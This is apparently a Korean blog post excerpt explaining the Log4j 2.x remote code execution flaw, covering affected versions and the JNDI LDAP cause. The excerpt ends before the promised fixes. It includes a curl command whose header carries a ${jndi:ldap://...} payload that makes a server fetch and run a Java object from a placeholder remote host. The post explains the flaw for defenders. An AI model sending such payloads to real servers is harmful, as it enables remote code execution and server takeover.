[Java] Apache Log4j 2.x 취약점 및 해결 방법 (Log4j2 remote code execution vulnerability)

12월 11일 Log4j에서 엄청난 취약점이 발견됐다는 소식이 나오길래 뭐 때문인지? 그리고 해결 방안은 무엇인지 찾아봤습니다. 취약 버전 2.0 beta9 <= Log4j2 <= 2.14.1 (1.x 버전은 해당사항 없음) 원인 Log4j의 ldap JNDI 파서를 통한 원격 코드 실행(RCE - Remote Code Execution) 취약점 때문에 문제가 발생했다. 예) request의 userAgent를 log4j를 사용해 로그를 찍는 경우 발생할 수 있습니다. xxx.xxx.xxx.xxx/a 에 위치한 자바 객체를 자동으로 서버에서 실행 시키는 공격 ex) # curl 127.0.0.1:8080 -H ‘X-Api-Version: ${jndi:ldap://xxx.xxx.xxx.xxx/a}’ 위와 같은 공격말고도 무궁무진한 방법을 사용할 수 있을 것으로 보입..........

원문링크 : [Java] Apache Log4j 2.x 취약점 및 해결 방법 (Log4j2 remote code execution vulnerability)